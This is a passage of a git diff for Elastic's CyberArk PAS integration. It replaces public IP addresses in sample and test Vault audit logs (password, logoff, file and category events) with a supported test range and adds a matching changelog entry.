05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set 
Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/8_logoff.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/8_logoff.log index 55eeab9c1a7..1fba00495ba 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/8_logoff.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/8_logoff.log 
@@ -4,12 +4,12 @@ <5>1 2021-03-10T08:28:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:29","IsoTimestamp":"2021-03-10T08:28:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAGWUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:49:06Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"34.71.250.247"}}} +<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n 
Logoff\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T17:49:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Logoff\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.15"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/98_open_file_write_only.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/98_open_file_write_only.log index f3062f7ea56..a0bb4b16a06 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/98_open_file_write_only.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/98_open_file_write_only.log 
@@ -1,4 +1,4 @@ <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"PVWAAppUser","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} -<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} -<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} +<5>1 2021-03-10T18:44:08Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} +<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 98\n Open File (Write Only)\n Info\n Administrator\n Open File (Write Only)\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Open File (Write Only)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write 
Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/changelog.yml b/packages/cyberarkpas/changelog.yml index 9d610fca55f..5a3e270afb0 100644 --- a/packages/cyberarkpas/changelog.yml +++ b/packages/cyberarkpas/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "2.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log index cb662d0ec48..5c630248bf1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log 
@@ -1,6 +1,6 @@ <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[Address]","ExtraDetails":"","Message":"Add File Category","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File 
Category","GatewayStation":""}}} -<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File 
Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File 